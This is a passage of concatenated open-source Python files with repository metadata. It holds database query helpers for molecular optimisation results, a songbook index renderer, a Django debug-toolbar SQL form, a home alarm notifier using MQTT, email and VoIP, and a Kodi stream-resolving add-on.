select opt_res.opt_id, result.id as result_id, result.return_result from result
join opt_result_association as opt_res
on result.id = opt_res.result_id
where opt_res.opt_id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
"""
return self.execute_query(sql_statement, with_keys=False)
class OptimizationQueries(QueryBase):
_class_name = "optimization"
_exclude = ["molecule_hash", "molecular_formula", "result_type"]
_query_method_map = {
"all_results": "_get_all_results",
"final_result": "_get_final_results",
"initial_molecule": "_get_initial_molecules",
"final_molecule": "_get_final_molecules",
}
def _remove_excluded_keys(self, data):
for key in self._exclude:
data.pop(key, None)
def _get_all_results(self, optimization_ids: List[Union[int, str]] = None):
"""Returns all the results objects (trajectory) of each optmization
Returns list(list) """
if optimization_ids is None:
self._raise_missing_attribute("all_results", "List of optimizations ids")
# row_to_json(result.*)
sql_statement = text(
"""
select * from base_result
join (
select opt_id, result.* from result
join opt_result_association as traj
on result.id = traj.result_id
where traj.opt_id in :optimization_ids
) result
on base_result.id = result.id
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(ResultORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
if key not in ret:
ret[key] = []
ret[key].append(ResultRecord(**rec))
return ret
def _get_final_results(self, optimization_ids: List[Union[int, str]] = None):
"""Return the actual results objects of the best result in each optimization"""
if optimization_ids is None:
self._raise_missing_attribute("final_result", "List of optimizations ids")
sql_statement = text(
"""
select * from base_result
join (
select opt_id, result.* from result
join (
select opt.opt_id, opt.result_id, max_pos from opt_result_association as opt
inner join (
select opt_id, max(position) as max_pos from opt_result_association
where opt_id in :optimization_ids
group by opt_id
) opt2
on opt.opt_id = opt2.opt_id and opt.position = opt2.max_pos
) traj
on result.id = traj.result_id
) result
on base_result.id = result.id
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(ResultORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
ret[key] = ResultRecord(**rec)
return ret
def _get_initial_molecules(self, optimization_ids=None):
if optimization_ids is None:
self._raise_missing_attribute("initial_molecule", "List of optimizations ids")
sql_statement = text(
"""
select opt.id as opt_id, molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.initial_molecule
where opt.id in :optimization_ids
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(MoleculeORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
rec = {k: v for k, v in rec.items() if v is not None}
ret[key] = Molecule(**rec)
return ret
def _get_final_molecules(self, optimization_ids=None):
if optimization_ids is None:
self._raise_missing_attribute("final_molecule", "List of optimizations ids")
sql_statement = text(
"""
select opt.id as opt_id, molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.final_molecule
where opt.id in :optimization_ids
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(MoleculeORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
rec = {k: v for k, v in rec.items() if v is not None}
ret[key] = Molecule(**rec)
return ret
| bsd-3-clause | -2,396,430,855,391,345,700 | 32.523918 | 117 | 0.575865 | false |
wojtex/cantionale | title_index.py | 1 | 1914 |
class TitleIndex:
def __init__(self, songbook, params):
self.title = ''
self.filter = lambda x : True
if 'title' in params: self.title = params['title']
if 'filter' in params: self.filter = params['filter']
def draw(self, canvas, songbook):
sb = songbook
st = sb.style
c = canvas
wdt = sb.width
position = sb.height - st.title_index_margin_top
c.setFont(st.title_index_title_font_name, st.title_index_title_font_size)
for line in self.title.strip().split(sep='\n'):
position -= st.title_index_title_line_height
c.drawCentredString(wdt/2, position, line)
position -= st.title_index_title_song_spacing
songs = []
for section in songbook.sections:
for no, song in enumerate(section.songs):
if self.filter((no,song)):
songs.append((song.title, section.index(no+1)))
songs.sort()
if sb.is_left_page(c):
margin_left = st.title_index_margin_outer
margin_right = st.title_index_margin_inner
else:
margin_left = st.toc_margin_inner
margin_right = st.toc_margin_outer
lh = st.title_index_song_line_height
for title, index in songs:
if lh + st.title_index_margin_bottom > position:
c.showPage()
position = sb.height - st.title_index_margin_top
if sb.is_left_page(c):
margin_left = st.title_index_margin_outer
margin_right = st.title_index_margin_inner
else:
margin_left = st.title_index_margin_inner
margin_right = st.title_index_margin_outer
position -= st.title_index_song_song_spacing
position -= lh
c.setFont(st.title_index_song_number_font_name, st.title_index_song_number_font_size)
c.drawRightString(st.title_index_song_number_indent + margin_left, position, index)
c.setFont(st.title_index_song_title_font_name, st.title_index_song_title_font_size)
c.drawString(st.title_index_song_title_indent + margin_left, position, title)
c.showPage()
if sb.is_left_page(c):
c.showPage()
| mit | -7,055,911,410,535,979,000 | 33.178571 | 88 | 0.692268 | false |
mvaled/sentry | src/debug_toolbar/panels/sql/forms.py | 1 | 2785 | from __future__ import absolute_import, unicode_literals
import json
import hashlib
from django import forms
from django.conf import settings
from django.db import connections
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.core.exceptions import ValidationError
from debug_toolbar.panels.sql.utils import reformat_sql
class SQLSelectForm(forms.Form):
"""
Validate params
sql: The sql statement with interpolated params
raw_sql: The sql statement with placeholders
params: JSON encoded parameter values
duration: time for SQL to execute passed in from toolbar just for redisplay
hash: the hash of (secret + sql + params) for tamper checking
"""
sql = forms.CharField()
raw_sql = forms.CharField()
params = forms.CharField()
alias = forms.CharField(required=False, initial="default")
duration = forms.FloatField()
hash = forms.CharField()
def __init__(self, *args, **kwargs):
initial = kwargs.get("initial", None)
if initial is not None:
initial["hash"] = self.make_hash(initial)
super(SQLSelectForm, self).__init__(*args, **kwargs)
for name in self.fields:
self.fields[name].widget = forms.HiddenInput()
def clean_raw_sql(self):
value = self.cleaned_data["raw_sql"]
if not value.lower().strip().startswith("select"):
raise ValidationError("Only 'select' queries are allowed.")
return value
def clean_params(self):
value = self.cleaned_data["params"]
try:
return json.loads(value)
except ValueError:
raise ValidationError("Is not valid JSON")
def clean_alias(self):
value = self.cleaned_data["alias"]
if value not in connections:
raise ValidationError("Database alias '%s' not found" % value)
return value
def clean_hash(self):
hash = self.cleaned_data["hash"]
if hash != self.make_hash(self.data):
raise ValidationError("Tamper alert")
return hash
def reformat_sql(self):
return reformat_sql(self.cleaned_data["sql"])
def make_hash(self, data):
items = [settings.SECRET_KEY, data["sql"], data["params"]]
# Replace lines endings with spaces to preserve the hash value
# even when the browser normalizes \r\n to \n in inputs.
items = [" ".join(force_text(item).splitlines()) for item in items]
return hashlib.sha1("".join(items).encode("utf-8")).hexdigest()
@property
def connection(self):
return connections[self.cleaned_data["alias"]]
@cached_property
def cursor(self):
return self.connection.cursor()
| bsd-3-clause | -6,826,950,877,515,031,000 | 28.946237 | 83 | 0.647038 | false |
bkbilly/AlarmPI | alarmcode/notifier.py | 1 | 21921 | #!/usr/bin/env python
import threading
from alarmcode.colors import bcolors
import paho.mqtt.client as mqtt
import random
import json
import os
import smtplib
from email.mime.text import MIMEText
from collections import OrderedDict
import subprocess
import sys
import re
import requests
import logging
logging = logging.getLogger('alarmpi')
g_wd = None
class notifyGPIO():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.mylogs = mylogs
try:
import RPi.GPIO as GPIO
self.connected = True
self.GPIO = GPIO
GPIO.setmode(GPIO.BCM)
except Exception:
logging.exception("Can't connect to GPIO Serene:")
self.connected = False
def startSerene(self):
""" This method enables the output pin for the serene """
if self.settings['serene']['enable'] is True and self.connected:
self.mylogs.writeLog("alarm", "Serene started")
serenePin = int(self.settings['serene']['pin'])
self.enableOutputPin(serenePin)
if self.settings['serene']['http_start'] != '':
try:
requests.get(self.settings['serene']['http_start'])
except Exception:
logging.exception("Can't find http_start on settings:")
def stopSerene(self):
""" This method disables the output pin for the serene """
if self.settings['serene']['enable'] is True and self.connected:
serenePin = self.settings['serene']['pin']
self.disableOutputPin(serenePin)
if self.settings['serene']['http_stop'] != '':
try:
requests.get(self.settings['serene']['http_stop'])
except Exception:
logging.exception("Can't find http_stop on settings:")
def enableOutputPin(self, *pins):
if self.connected:
for pin in pins:
self.GPIO.setup(pin, self.GPIO.OUT)
state = self.GPIO.input(pin)
if state == self.GPIO.LOW:
logging.info('Enabling GPIO')
self.GPIO.output(pin, self.GPIO.HIGH)
def disableOutputPin(self, *pins):
if self.connected:
for pin in pins:
self.GPIO.setup(pin, self.GPIO.OUT)
if self.GPIO.input(pin) == self.GPIO.HIGH:
logging.info('Disabling GPIO')
self.GPIO.output(pin, self.GPIO.LOW)
self.GPIO.setup(pin, self.GPIO.IN)
def status(self):
return self.connected
class notifyUI():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.optsUpdateUI = optsUpdateUI
def updateUI(self, event, data):
""" Send changes to the UI """
self.optsUpdateUI['obj'](event, data, room=self.optsUpdateUI['room'])
class notifyMQTT():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.optsUpdateUI = optsUpdateUI
self.callbacks = callbacks
self.isconnected = False
self.version = self.getVersion()
self.setupMQTT()
def getVersion(self):
version = 0
global g_wd
setupfile = os.path.join(g_wd, "setup.py")
with open(setupfile) as setup:
for line in setup:
if 'version=' in line:
match = re.findall(r"\'(.*?)\'", line)
if len(match) > 0:
version = match[0]
return version
def setupMQTT(self):
""" Start or Stop the MQTT connection based on the settings """
# self.mqttclient = mqtt.Client("", True, None, mqtt.MQTTv311)
if not hasattr(self, 'mqttclient'):
self.mqttclient = mqtt.Client(client_id=str(random.randint(1,10000)), clean_session=False)
self.mqttclient.disconnect()
self.mqttclient.loop_stop(force=False)
if self.settings['mqtt']['enable']:
try:
mqttHost = self.settings['mqtt']['host']
mqttPort = self.settings['mqtt']['port']
self.mqttclient.on_message = self.on_message_mqtt
if (self.settings['mqtt']['password'] != ""):
self.mqttclient.username_pw_set(
username=self.settings['mqtt']['username'],
password=self.settings['mqtt']['password'])
self.mqttclient.on_connect = self.on_connect
self.mqttclient.on_disconnect = self.on_disconnect
self.mqttclient.connect(mqttHost, mqttPort, 10)
self.mqttclient.loop_start()
except Exception:
logging.exception("Can't connecto to MQTT")
else:
self.mqttclient.disconnect()
self.mqttclient.loop_stop(force=False)
# return self.sendStateMQTT
def on_connect(self, client, userdata, flags, rc):
self.isconnected = True
# Subscribe to Alarm Set command
logging.info('MQTT subscribing to: {0}'.format(self.settings['mqtt']['command_topic']))
self.mqttclient.subscribe(self.settings['mqtt']['command_topic'])
self.mqttclient.subscribe(self.settings['mqtt']['command_topic'] + '/available')
# Subscribe to Sensor Set command
for sensor, sensorvalue in self.settings['sensors'].items():
# Subscribe to mqtt sensors events
setmqttsensor = '{0}{1}{2}'.format(
self.settings['mqtt']['command_topic'],
'/sensor/',
sensorvalue['name'].lower().replace(' ', '_'))
logging.info('MQTT subscribing to: {0}'.format(setmqttsensor))
self.mqttclient.subscribe(setmqttsensor)
# Subscribe to custom MQTT sensors events
if sensorvalue['type'].lower() == 'mqtt' and 'topic' in sensorvalue:
if sensorvalue['topic'] is not None and sensorvalue['topic'] != '':
logging.info('MQTT subscribing to: {0}'.format(sensorvalue['topic']))
self.mqttclient.subscribe(sensorvalue['topic'])
# Home assistant integration
if self.settings['mqtt']['homeassistant']:
statemqttsensor = '{0}/sensor/{1}'.format(
self.settings['mqtt']['state_topic'],
sensorvalue['name']
)
sensor_name = sensorvalue['name'].lower().replace(' ', '_')
has_topic = "homeassistant/binary_sensor/{0}_{1}/config".format(self.optsUpdateUI['room'], sensor_name)
logging.info(has_topic)
has_config = {
"payload_on": "on",
"payload_off": "off",
"device_class": "door",
"state_topic": statemqttsensor,
"name": "AlarmPI-{0}-{1}".format(self.optsUpdateUI['room'], sensorvalue['name']),
"unique_id": "alarmpi_{0}_{1}".format(self.optsUpdateUI['room'], sensor_name),
"device": {
"identifiers": "alarmpi-{0}".format(self.optsUpdateUI['room']),
"name": "AlarmPI-{0}".format(self.optsUpdateUI['room']),
"sw_version": "AlarmPI {0}".format(self.version),
"model": "Raspberry PI",
"manufacturer": "bkbilly"
}
}
has_payload = json.dumps(has_config)
self.mqttclient.publish(has_topic, has_payload, retain=True, qos=2)
# Home assistant integration
if self.settings['mqtt']['homeassistant']:
has_topic = "homeassistant/alarm_control_panel/{0}/config".format(self.optsUpdateUI['room'])
logging.info(has_topic)
has_config = {
"name": "alarmpi {0}".format(self.optsUpdateUI['room']),
"payload_arm_home": "ARM_HOME",
"payload_arm_away": "ARM_AWAY",
"payload_arm_night": "ARM_NIGHT",
"state_topic": self.settings['mqtt']['state_topic'],
"command_topic": self.settings['mqtt']['command_topic'],
"unique_id": "alarmpi_{0}".format(self.optsUpdateUI['room']),
"device": {
"identifiers": "alarmpi-{0}".format(self.optsUpdateUI['room']),
"name": "AlarmPI-{0}".format(self.optsUpdateUI['room']),
"sw_version": "AlarmPI {0}".format(self.version),
"model": "Raspberry PI",
"manufacturer": "bkbilly"
}
}
code = self.settings['mqtt'].get('code')
if code is not None:
has_config['code'] = code
has_payload = json.dumps(has_config)
self.mqttclient.publish(has_topic, has_payload, retain=True, qos=2)
def on_disconnect(self, client, userdata, rc):
self.isconnected = False
logging.warning("MQTT disconnecting reason " +str(rc))
def on_message_mqtt(self, mqttclient, userdata, msg):
""" Arm or Disarm on message from subscribed MQTT topics """
message = msg.payload.decode("utf-8")
topicArm = self.settings['mqtt']['command_topic']
topicSensorSet = self.settings['mqtt']['command_topic'] + '/sensor/'
logging.info(msg.topic + " " + message)
try:
if msg.topic == self.settings['mqtt']['command_topic']:
if message == "DISARM":
self.callbacks['deactivateAlarm']()
elif message == "ARM_HOME":
self.callbacks['activateAlarm']('home')
elif message == "ARM_AWAY":
self.callbacks['activateAlarm']('away')
elif message == "ARM_NIGHT":
self.callbacks['activateAlarm']('night')
elif msg.topic == self.settings['mqtt']['command_topic'] + '/available':
logging.info(msg.topic + " " + message)
self.mqttclient.publish(self.settings['mqtt']['state_topic'] + '/available', 'online', retain=False, qos=2)
elif topicSensorSet in msg.topic:
sensorName = msg.topic.replace(topicSensorSet, '')
for sensor, sensorvalue in self.settings['sensors'].items():
if sensorvalue['name'].lower().replace(' ', '_') == sensorName:
if message.lower() == 'on':
self.callbacks['sensorAlert'](sensor)
else:
self.callbacks['sensorStopAlert'](sensor)
elif msg.topic in [value.get('topic') for value in self.settings['sensors'].values() if value.get('topic') is not None]:
for sensor, sensorvalue in self.settings['sensors'].items():
if sensorvalue.get('topic') == msg.topic:
message = json.loads(message)
if eval(sensorvalue['payload']) is True:
self.callbacks['sensorStopAlert'](sensor)
else:
self.callbacks['sensorAlert'](sensor)
except Exception:
logging.exception("Unknown MQTT Error:")
def sendStateMQTT(self):
""" Send to the MQTT server the state of the alarm
(disarmed, triggered, armed_away) """
if self.settings['mqtt']['enable']:
stateTopic = self.settings['mqtt']['state_topic']
state = self.settings['settings']['alarmState']
if self.settings['settings']['alarmState'] == 'armed':
state = 'armed_away'
self.mqttclient.publish(stateTopic, state, retain=True, qos=2)
def sendSensorMQTT(self, topic, state):
if self.settings['mqtt']['enable']:
self.mqttclient.publish(topic, state, retain=False, qos=2)
def status(self):
return self.isconnected
class notifyEmail():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.mylogs = mylogs
def sendMail(self):
""" This method sends an email to all recipients
in the json settings file. """
if self.settings['mail']['enable'] is True:
mail_user = self.settings['mail']['username']
mail_pwd = self.settings['mail']['password']
smtp_server = self.settings['mail']['smtpServer']
smtp_port = int(self.settings['mail']['smtpPort'])
bodyMsg = self.settings['mail']['messageBody']
LogsTriggered = self.mylogs.getSensorsLog(
fromText='Alarm activated')['log']
LogsTriggered.reverse()
for logTriggered in LogsTriggered:
bodyMsg += '<br>' + logTriggered
msg = MIMEText(bodyMsg, 'html')
sender = mail_user
recipients = self.settings['mail']['recipients']
msg['Subject'] = self.settings['mail']['messageSubject']
msg['From'] = sender
msg['To'] = ", ".join(recipients)
smtpserver = smtplib.SMTP(smtp_server, smtp_port)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.login(mail_user, mail_pwd)
smtpserver.sendmail(sender, recipients, msg.as_string())
smtpserver.close()
self.mylogs.writeLog("alarm", "Mail sent to: " + ", ".join(recipients))
def status(self):
connected = False
if self.settings['mail']['enable'] is True:
try:
mail_user = self.settings['mail']['username']
mail_pwd = self.settings['mail']['password']
smtp_server = self.settings['mail']['smtpServer']
smtp_port = int(self.settings['mail']['smtpPort'])
smtpserver = smtplib.SMTP(smtp_server, smtp_port)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.login(mail_user, mail_pwd)
smtpserver.close()
connected = True
except Exception:
logging.exception("Mail server seems down:")
return connected
class notifyVoip():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.mylogs = mylogs
global g_wd
self.sipcallfile = os.path.join(
os.path.join(g_wd, "voip"), "sipcall")
def callNotify(self):
""" This method uses a prebuild application in C to connect to the SIP provider
and call all the numbers in the json settings file.
"""
sip_domain = str(self.settings['voip']['domain'])
sip_user = str(self.settings['voip']['username'])
sip_password = str(self.settings['voip']['password'])
sip_repeat = str(self.settings['voip']['timesOfRepeat'])
if self.settings['voip']['enable'] is True:
for phone_number in self.settings['voip']['numbersToCall']:
phone_number = str(phone_number)
if self.settings['settings']['alarmState'] == "triggered":
self.mylogs.writeLog("alarm", "Calling " + phone_number)
cmd = (self.sipcallfile, '-sd', sip_domain,
'-su', sip_user, '-sp', sip_password,
'-pn', phone_number, '-s', '1', '-mr', sip_repeat,
'-ttsf', g_wd + '/play.wav')
logging.info("{0}Voip command: {2}{1}".format(
bcolors.FADE, bcolors.ENDC, " ".join(cmd)))
proc = subprocess.Popen(cmd, stderr=subprocess.PIPE)
for line in proc.stderr:
sys.stderr.write(str(line))
proc.wait()
self.mylogs.writeLog("alarm", "Call to " +
phone_number + " endend")
logging.info("{0}Call Ended{1}".format(
bcolors.FADE, bcolors.ENDC))
class notifyHTTP():
def __init__(self, settings, optsUpdateUI, mylogs, callbacks):
self.settings = settings
self.optsUpdateUI = optsUpdateUI
def sendSensorHTTP(self, name, state):
if self.settings['http']['enable']:
try:
http = 'http://'
if self.settings['http']['https']:
http = 'https://'
host = '{0}{5}:{6}@{1}:{2}/setSensorStatus?name={3}&state={4}'.format(
http,
self.settings['http']['host'],
self.settings['http']['port'],
name,
state,
self.settings['http']['username'],
self.settings['http']['password'],
)
requests.get(host, verify=False)
except Exception:
logging.exception("Can't connect to remote AlarmPI server:")
class Notify():
def __init__(self, wd, settings, optsUpdateUI, mylogs):
global g_wd
g_wd = wd
self.mylogs = mylogs
self.callbacks = {}
self.callbacks['deactivateAlarm'] = lambda *args:0
self.callbacks['activateAlarm'] = lambda *args:0
self.callbacks['sensorAlert'] = lambda *args:0
self.callbacks['sensorStopAlert'] = lambda *args:0
self.room = 'initial'
self.optsUpdateUI = optsUpdateUI
self.settings = settings
self.room = self.optsUpdateUI['room']
logging.info("{0}------------ INIT FOR DOOR SENSOR CLASS! ----------------{1}"
.format(bcolors.HEADER, bcolors.ENDC))
self.gpio = notifyGPIO(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.ui = notifyUI(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.mqtt = notifyMQTT(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.email = notifyEmail(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.voip = notifyVoip(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
self.http = notifyHTTP(self.settings, self.optsUpdateUI, self.mylogs, self.callbacks)
def updateMQTT(self):
self.mqtt.setupMQTT()
def status(self):
return {
'email': self.email.status(),
'gpio': self.gpio.status(),
'mqtt': self.mqtt.status(),
}
def startSiren(self):
self.gpio.startSerene()
def stopSiren(self):
self.gpio.stopSerene()
def intruderAlert(self):
""" This method is called when an intruder is detected. It calls
all the methods whith the actions that we want to do.
Sends MQTT message, enables serene, Send mail, Call Voip.
"""
self.mylogs.writeLog("alarm", "Intruder Alert")
self.gpio.startSerene()
self.mqtt.sendStateMQTT()
self.ui.updateUI('sensorsChanged', self.getSensorsArmed())
threadSendMail = threading.Thread(target=self.email.sendMail)
threadSendMail.daemon = True
threadSendMail.start()
threadCallVoip = threading.Thread(target=self.voip.callNotify)
threadCallVoip.daemon = True
threadCallVoip.start()
def update_sensor(self, sensorUUID):
#Define
name = self.settings['sensors'][sensorUUID]['name']
stateTopic = self.settings['mqtt']['state_topic'] + '/sensor/' + name
if self.settings['sensors'][sensorUUID]['online'] == False:
sensorState = 'error'
elif self.settings['sensors'][sensorUUID]['alert'] == True:
sensorState = 'on'
elif self.settings['sensors'][sensorUUID]['alert'] == False:
sensorState = 'off'
self.mylogs.writeLog("{0},{1},{2}".format('sensor', sensorState, sensorUUID), name)
self.ui.updateUI('sensorsChanged', self.getSensorsArmed())
self.mqtt.sendSensorMQTT(stateTopic, sensorState)
self.http.sendSensorHTTP(name, sensorState)
def update_alarmstate(self):
if self.settings['settings']['alarmState'] == "armed":
self.mylogs.writeLog("user_action", "Alarm activated")
elif self.settings['settings']['alarmState'] == "disarmed":
self.mylogs.writeLog("user_action", "Alarm deactivated")
elif self.settings['settings']['alarmState'] == "pending":
self.mylogs.writeLog("user_action", "Alarm is pending for activation")
self.gpio.stopSerene()
self.mqtt.sendStateMQTT()
self.ui.updateUI('sensorsChanged', self.getSensorsArmed())
def updateUI(self, event, data):
self.ui.updateUI(event, data)
def getSensorsArmed(self):
""" Returns the sensors and alarm status
as a json to use it to the UI """
sensorsArmed = {}
sensors = self.settings['sensors']
orderedSensors = OrderedDict(
sorted(sensors.items(), key=lambda k_v: k_v[1]['name']))
sensorsArmed['sensors'] = orderedSensors
sensorsArmed['alarmState'] = self.settings['settings']['alarmState']
return sensorsArmed
def settings_update(self, settings):
self.settings = settings
def on_disarm(self, callback):
self.callbacks['deactivateAlarm'] = callback
def on_arm(self, callback):
self.callbacks['activateAlarm'] = callback
def on_sensor_set_alert(self, callback):
self.callbacks['sensorAlert'] = callback
def on_sensor_set_stopalert(self, callback):
self.callbacks['sensorStopAlert'] = callback
| mit | -2,687,133,209,626,197,500 | 40.833969 | 132 | 0.556042 | false |
manusev/plugin.video.kuchitv | resources/regex/freebroadcast.py | 1 | 5105 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# MonsterTV - XBMC Add-on by Juarrox ([email protected])
# Version 0.2.9 (18.07.2014)
#------------------------------------------------------------
# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)
# Gracias a la librería plugintools de Jesús (www.mimediacenter.info)
import os
import sys
import urllib
import urllib2
import re
import shutil
import zipfile
import time
import xbmc
import xbmcgui
import xbmcaddon
import xbmcplugin
import plugintools
import json
addonName = xbmcaddon.Addon().getAddonInfo("name")
addonVersion = xbmcaddon.Addon().getAddonInfo("version")
addonId = xbmcaddon.Addon().getAddonInfo("id")
addonPath = xbmcaddon.Addon().getAddonInfo("path")
# Función que guía el proceso de elaboración de la URL original
def freebroadcast(params):
plugintools.log("[MonsterTV-0.3.0].freebroadcast "+repr(params))
url_user = {}
# Construimos diccionario...
url = params.get("url")
url_extracted = url.split(" ")
for entry in url_extracted:
if entry.startswith("rtmp"):
entry = entry.replace("rtmp=", "")
url_user["rtmp"]=entry
elif entry.startswith("playpath"):
entry = entry.replace("playpath=", "")
url_user["playpath"]=entry
elif entry.startswith("swfUrl"):
entry = entry.replace("swfUrl=", "")
url_user["swfurl"]=entry
elif entry.startswith("pageUrl"):
entry = entry.replace("pageUrl=", "")
url_user["pageurl"]=entry
elif entry.startswith("token"):
entry = entry.replace("token=", "")
url_user["token"]=entry
elif entry.startswith("referer"):
entry = entry.replace("referer=", "")
url_user["referer"]=entry
plugintools.log("URL_user dict= "+repr(url_user))
pageurl = url_user.get("pageurl")
# Controlamos ambos casos de URL: Único link (pageUrl) o link completo rtmp://...
if pageurl is None:
pageurl = url_user.get("url")
referer= url_user.get("referer")
if referer is None:
referer = 'http://www.juanin.tv'
# channel_id = re.compile('channel=([^&]*)').findall(pageurl)
# print channel_id
# channel_id = channel_id[0]
pageurl = 'http://freebroadcast.pw/embed/embed.php?n=' + url_user.get("playpath") + '&w=670&h=400'
url_user["pageurl"]=pageurl
print 'pageurl',pageurl
print 'referer',referer
body = gethttp_headers(pageurl, referer)
getparams_freebroadcast(url_user, body)
url = url_user.get("ip") + ' playpath=' + url_user.get("playpath") + ' swfUrl=http://freebroadcast.pw/player/player.swf pageUrl=' + url_user.get("pageurl") + ' live=1 timeout=10'
plugintools.play_resolved_url(url)
# Vamos a hacer una llamada al pageUrl
def gethttp_headers(pageurl, referer):
request_headers=[]
request_headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"])
# request_headers.append(["Referer",referer])
body,response_headers = plugintools.read_body_and_headers(pageurl, headers=request_headers)
plugintools.log("body= "+body)
return body
# Iniciamos protocolo de elaboración de la URL original
# Capturamos parámetros correctos
def getparams_freebroadcast(url_user, body):
plugintools.log("[MonsterTV-0.3.0].getparams_freebroadcast " + repr(url_user) )
# Construimos el diccionario de 9stream
entry = plugintools.find_single_match(body, 'setStream(token) {(.*?)}')
ip = re.compile("streamer', \'(.*?)\'").findall(body)
url_user["ip"]=str(ip[0])
plugintools.log("IP= "+str(ip[0]))
# Vamos a capturar el playpath
def getfile_freebroadcast(url_user, decoded, body):
plugintools.log("MonsterTV getfile_freebroadcast( "+repr(url_user))
referer = url_user.get("referer")
req = urllib2.Request(decoded)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
req.add_header('Referer', referer)
response = urllib2.urlopen(req)
print response
data = response.read()
print data
file = re.compile("file': '([^.]*)").findall(data)
print 'file',file
return file
# Vamos a capturar el fileserver.php (token del server)
def get_fileserver(decoded, url_user):
plugintools.log("MonsterTV fileserver "+repr(url_user))
referer=url_user.get("pageurl")
req = urllib2.Request(decoded)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
req.add_header('Referer',referer)
response = urllib2.urlopen(req)
print response
data = response.read()
print data
token = re.compile('token":"(.*)"').findall(data)
print 'token',token
return token
| gpl-2.0 | 6,524,703,570,245,585,000 | 34.395833 | 182 | 0.627232 | false |
soybean217/lora-python | UServer/admin_server/admin_data_update/model/gateway_locaton_data.py | 1 | 1618 | # _*_ coding:utf-8 _*_
from database.db4 import db4, Channel4, ConstDB4
from utils.log import Logger, Action
class Location:
channel_name = Channel4.gis_gateway_location + '*'
def __init__(self):
self.ps = db4.pubsub()
def psubscribe_gis(self):
self.ps.psubscribe(self.channel_name)
return self.ps
def stop_listen(self):
if hasattr(self, 'ps'):
self.ps.punsubscribe()
def listen_gis_gateway_location(self):
Logger.info(Action.listen, 'psubscribe', self.channel_name, 'Begin listen')
ps_init = self.psubscribe_gis()
for item in ps_init.listen():
if item is not None:
if item['type'] == 'pmessage':
Logger.info(Action.listen, item['channel'].decode(), 'MESSAGE', item['data'].decode())
gateway_id = item['channel'].decode().split(':')[1]
location_data = item['data'].decode().split(',')
if len(location_data) == 3:
lng = float(location_data[0])
lat = float(location_data[1])
alt = int(location_data[2])
msg = self.Object(gateway_id, lat=lat, lng=lng, alt=alt)
yield msg
else:
Logger.info(Action.listen, item['channel'].decode(), item['type'], item['data'])
class Object:
def __init__(self, gw_id, lat, lng, alt):
self.gateway_id = gw_id
self.latitude = lat
self.longitude = lng
self.altitude = alt
| mit | -8,514,074,294,372,980,000 | 34.173913 | 106 | 0.520396 | false |
geishatokyo-lightning/lightning | lightning_core/vg/cssanim.py | 1 | 14273 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011 Geisha Tokyo Entertainment, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
